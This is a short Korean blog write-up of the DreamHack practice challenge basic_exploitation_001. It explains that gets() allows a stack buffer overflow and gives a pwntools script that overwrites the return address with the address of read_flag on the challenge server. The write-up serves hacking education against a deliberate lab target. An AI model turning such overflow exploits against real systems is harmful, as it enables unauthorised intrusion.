[DreamHack] basic_exploitation

시스템 해킹/DreamHack으로 해커를 꿈꾸며

[DreamHack] basic_exploitation_001

0x6b6569 2023. 2. 22. 21:37

gets는 BOF 취약점이 있는 함수!

지렁이 같지만 열심히 플래그를 탈취하기 위한 방법을 그려봤다.

read_flag의 주소만 알아낸다면 쉽게 풀 수 있다.

from pwn import *


p = remote("host3.dreamhack.games", 15977)

payload = b"A"*128
payload += p32(0xFFFFFFFF)
payload += p32(0x080485b9)

p.sendline(payload)
p.interactive()

휴

저작자표시

'시스템 해킹 > DreamHack으로 해커를 꿈꾸며' 카테고리의 다른 글

NX & ASLR 이란? (1)	2023.02.27
컴퓨터 시스템 라이브러리란(Library - Static Link vs. Dynamic Link) (0)	2023.02.26
[DreamHack] basic_exploitation_000 (Stack Buffer Overflow) (0)	2023.02.21
[DreamHack] Return Address Overwrite (0)	2023.02.20
[DreamHack] 함수 호출 규약 (Caller, Callee, cdecl, SYSV) (1)	2023.02.18

현재글[DreamHack] basic_exploitation_001

인공위성 보안을 연구하는 대학원생

plt, 해킹공부, CCSDS #우주보안, 스택, 포너블, 리버싱, ASLR, 해킹, Dreamhack, 칼리, NX, 해킹공부하는법, 시스템 해킹, 프로토스타, 해킹연습, 드림핵, shellcode, 해킹강좌, BOF, 시스템해킹,

Today :
Yesterday :

일	월	화	수	목	금	토
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31

SAT_HACK

[DreamHack] basic_exploitation_001

'시스템 해킹 > DreamHack으로 해커를 꿈꾸며' 카테고리의 다른 글

'시스템 해킹/DreamHack으로 해커를 꿈꾸며'의 다른글

티스토리툴바

[DreamHack] basic_exploitation_001

'시스템 해킹 > DreamHack으로 해커를 꿈꾸며' 카테고리의 다른 글

'시스템 해킹/DreamHack으로 해커를 꿈꾸며'의 다른글

관련글

티스토리툴바